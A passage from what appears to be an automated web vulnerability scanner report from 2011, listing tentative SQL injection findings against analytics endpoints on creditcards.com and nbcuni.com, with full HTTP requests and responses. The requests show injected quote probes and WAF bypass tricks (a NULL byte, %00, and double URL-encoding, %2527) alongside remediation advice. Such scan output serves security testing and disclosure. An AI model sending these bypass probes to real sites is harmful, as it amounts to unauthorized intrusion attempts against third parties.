GET /b/ss%00'/ccardsccdc-us/1/H.17/s95104773896746?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A9%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22105064%26pg%3D1477%26pgpos%3D2&cc=USD&xact=1012011061705400871194905&purchaseID=1012011061705400871194905&events=purchase%2Cevent2&products=1477%3B22105064%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400871194905&v15=5%3A30AM&c16=2&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=2&v28=lead%20confirmation&v29=1477%3A22105064%7C2&v30=1477%3A22105064&v31=22105064%7C2&v32=1477%7C2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105064&pg=1477&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 405
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/ccardsccdc-us/1/H.17/s95104773896746?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A9%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22105064%26pg%3D1477%26pgpos%3D2&cc=USD&xact=1012011061705400871194905&purchaseID=1012011061705400871194905&events=purchase%2Cevent2&products=1477%3B22105064%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400871194905&v15=5%3A30AM&c16=2&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=2&v28=lead%20confirmation&v29=1477%3A22105064%7C2&v30=1477%3A22105064&v31=22105064%7C2&v32=1477%7C2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105064&pg=1477&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
xserver: www608
Content-Length: 0
Content-Type: text/html


1.5. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95972011631820 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s95972011631820

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/ccardsccdc-us/1/H.17/s95972011631820?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A20%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22125744%26pg%3D1477%26pgpos%3D5&cc=USD&xact=1012011061705401932014371&purchaseID=1012011061705401932014371&events=purchase%2Cevent2&products=1477%3B22125744%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705401932014371&v15=5%3A30AM&c16=5&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=5&v28=lead%20confirmation&v29=1477%3A22125744%7C5&v30=1477%3A22125744&v31=22125744%7C5&v32=1477%7C5&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=1477&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 402
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/ccardsccdc-us/1/H.17/s95972011631820?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A20%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22125744%26pg%3D1477%26pgpos%3D5&cc=USD&xact=1012011061705401932014371&purchaseID=1012011061705401932014371&events=purchase%2Cevent2&products=1477%3B22125744%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705401932014371&v15=5%3A30AM&c16=5&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=5&v28=lead%20confirmation&v29=1477%3A22125744%7C5&v30=1477%3A22125744&v31=22125744%7C5&v32=1477%7C5&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=1477&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
xserver: www608
Content-Length: 0
Content-Type: text/html


1.6. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s9749755890574 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s9749755890574

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/ccardsccdc-us/1/H.17/s9749755890574?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A8%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705400772499673&purchaseID=1012011061705400772499673&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400772499673&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:54:59 GMT
Server: Omniture DC/2.0.0
Content-Length: 405
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/ccardsccdc-us/1/H.17/s9749755890574?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A8%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705400772499673&purchaseID=1012011061705400772499673&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400772499673&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:54:59 GMT
Server: Omniture DC/2.0.0
xserver: www630
Content-Length: 0
Content-Type: text/html


1.7. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s99864659090526 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s99864659090526

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/ccardsccdc-us/1/H.17/s99864659090526?AQB=1&ndh=1&t=17/5/2011%205%3A42%3A21%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705422092885507&purchaseID=1012011061705422092885507&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705422092885507&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:58:30 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/ccardsccdc-us/1/H.17/s99864659090526 was not
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/ccardsccdc-us/1/H.17/s99864659090526?AQB=1&ndh=1&t=17/5/2011%205%3A42%3A21%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705422092885507&purchaseID=1012011061705422092885507&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705422092885507&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:58:30 GMT
Server: Omniture DC/2.0.0
xserver: www404
Content-Length: 0
Content-Type: text/html


1.8. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://oimg.nbcuni.com
Path:   /b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022?[AQB]&ndh=1&t=16/5/2011%2012%3A4%3A33%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=1%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 17:16:16 GMT
Server: Omniture DC/2.0.0
Content-Length: 459
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/nbcuglobal, nbcucnbcd, nbcucnbcbu/1/H.2-pdv-2/
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022?[AQB]&ndh=1&t=16/5/2011%2012%3A4%3A33%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=1%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 17:16:16 GMT
Server: Omniture DC/2.0.0
xserver: www339
Content-Length: 0
Content-Type: text/html


1.9. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://oimg.nbcuni.com
Path:   /b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

